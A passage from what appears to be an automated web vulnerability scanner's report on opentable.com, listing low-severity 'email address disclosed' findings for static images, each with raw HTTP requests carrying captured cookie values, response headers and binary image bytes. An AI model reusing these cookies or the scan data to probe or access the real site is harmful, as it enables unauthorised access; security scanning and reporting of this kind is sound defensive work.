Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:52 GMT

.PNG
.
...IHDR...v...G......3.....BPLTE...................................................................z$.....tRNS.............................kIDATx....r.@...I...r.q... ..!.\S%.....*.bM....X.+u
...[SNIP]...
20.88. http://www.opentable.com/img/buttons/btn_findatableNew.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttons/btn_findatableNew.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttons/btn_findatableNew.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4316
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

.PNG
.
...IHDR...m.........L.`....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.89. http://www.opentable.com/img/buttons/close_popup.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttons/close_popup.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttons/close_popup.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 916
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:53 GMT

GIF89a...................SMH...........~..................($%kii...B8,....u......................................................e]S........................LB7...................................{....
...[SNIP]...
20.90. http://www.opentable.com/img/buttons/poweredbyOpenTableStacked.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttons/poweredbyOpenTableStacked.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttons/poweredbyOpenTableStacked.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2271
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

.PNG
.
...IHDR.......0......*......PLTE...................................Z..........AA.....%%..........II.....`............................VV........i..r..f.22..........GG.............++......c..
...[SNIP]...
20.91. http://www.opentable.com/img/buttons/results-grid-buttons-restrefAB.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttons/results-grid-buttons-restrefAB.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttons/results-grid-buttons-restrefAB.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4296
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

GIF89a..6......n<2(.......uC8,............4+"....../'."..............+$...x.....................................' ..........8/%.
..........A6*...........f..n.................f......................
...[SNIP]...
20.92. http://www.opentable.com/img/buttonsNew/secondary_left_medium.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttonsNew/secondary_left_medium.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttonsNew/secondary_left_medium.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 423
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:12 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:52 GMT

.PNG
.
...IHDR.....................PLTE......($%523...................................................................................................kii.................Qr...+tRNS..................
...[SNIP]...
20.93. http://www.opentable.com/img/buttonsNew/secondary_right_medium.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttonsNew/secondary_right_medium.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttonsNew/secondary_right_medium.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 479
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:12 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:50 GMT

.PNG
.
...IHDR.......\.....jK.r....PLTE......($%523...xVw.............................................................................................kii......................+tRNS..................
...[SNIP]...
20.94. http://www.opentable.com/img/common/1x1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/1x1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/1x1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:02 GMT

GIF89a.............!.......,...........D..;
20.95. http://www.opentable.com/img/common/Badge_Anon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/Badge_Anon.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/Badge_Anon.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 153
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:36 GMT

GIF89a.....................n.........!.......,..........^X@......}.....`(.d.    ......\.....h..sf.@.m..Ed.$....*.s'.>.P%.9.......Y.Y....oM..|N..;>.$o.$..;
20.96. http://www.opentable.com/img/common/default_img_DC.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/default_img_DC.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/default_img_DC.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 366
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:35 GMT

GIF89a4.8............................!.......,....4.8....8...0.B..8.}..`hybi......n.+.s].........+%t...#..l2u..@@.Z.U...........)+`.:.Mv3..\\.(.....9....|.G...0o.T...}...z.7.iW..WLj....>t.j...U..b..V
...[SNIP]...
20.97. http://www.opentable.com/img/common/icons_final2.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/icons_final2.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/icons_final2.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4337
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:38 GMT

.PNG
.
...IHDR.............t..'....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...{LTW.....0....+E.....Q7l5].Kw..u[.+...p.......&.>..M...Q..I....Ku......C\6....(:...E.....f.o8.9\....]..IN..{...|......
...[SNIP]...
20.98. http://www.opentable.com/img/common/img_diningChk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/img_diningChk.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/img_diningChk.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2470
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:31 GMT

GIF89aN.U............z.....y..f........z........~....................................................................j.................h....................f..u..w...........u........b.....d..{.......
...[SNIP]...
20.99. http://www.opentable.com/img/common/privatedining_startpagepromo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/privatedining_startpagepromo.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/privatedining_startpagepromo.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4534
Content-Type: image/jpeg
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:34 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...
20.100. http://www.opentable.com/img/dnbase/arr_carot_gray.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/arr_carot_gray.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/arr_carot_gray.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 49
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:01 GMT

GIF89a.......fff...!.......,................z^*.;
20.101. http://www.opentable.com/img/dnbase/circle_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/circle_1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/circle_1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 132
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:28 GMT

GIF89a........cN.(..H9.$.}qZ.........y.e.....................!.......,..........1.!"F)C..@8`.........Y.mh..y....5......Lu."..b.h$..;
20.102. http://www.opentable.com/img/dnbase/circle_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/circle_2.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/circle_2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 133
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:28 GMT

GIF89a........cN.(..H9.$.}qZ.........y.e.....................!.......,..........2.!"F)C..@8`..........V'.........~..XLc..:E.IB.`4...;
20.103. http://www.opentable.com/img/dnbase/circle_3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/circle_3.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/circle_3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 104
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:29 GMT

GIF89a.............y.e[K>./*.........!.......,..........-h&CU.....e....V.u_...)zX.b..B1....M.Kh..%21$..;
20.104. http://www.opentable.com/img/dnbase/dotrul.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/dotrul.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/dotrul.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:06 GMT

GIF89a.......XX@...!.......,...........DR.;
20.105. http://www.opentable.com/img/dnbase/dotrul_706.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/dotrul_706.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/dotrul_706.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
